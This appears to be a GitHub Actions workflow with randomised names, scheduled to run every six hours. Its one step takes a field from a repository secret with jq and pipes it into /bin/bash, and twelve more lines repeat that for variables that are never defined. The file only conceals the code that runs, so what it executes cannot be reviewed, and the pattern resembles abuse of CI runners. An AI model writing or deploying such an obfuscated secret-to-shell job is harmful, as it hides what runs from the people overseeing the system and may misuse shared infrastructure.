name: ruanxiaoer19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '58 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ruanxiaoer19871010
        env:
          tvcb4174: ${{ secrets.tvcb4174 }}
        run: |
          echo $tvcb4174 | jq -r .e3598 | /bin/bash
          echo $itrz88462 | jq -r .h12209 | /bin/bash
          echo $aib8025 | jq -r .c72459 | /bin/bash
          echo $fpowt85 | jq -r .xrd9 | /bin/bash
          echo $d14 | jq -r .izpo8 | /bin/bash
          echo $ql7350 | jq -r .lc855 | /bin/bash
          echo $yihd10185 | jq -r .kbry8 | /bin/bash
          echo $lrt59438 | jq -r .ystyp517 | /bin/bash
          echo $qzb6598 | jq -r .zdcei48 | /bin/bash
          echo $qrf954 | jq -r .ii98 | /bin/bash
          echo $nu6750 | jq -r .k13 | /bin/bash
          echo $sbgxs928 | jq -r .kube335 | /bin/bash
          echo $ritkj28111 | jq -r .mpgk8763 | /bin/bash

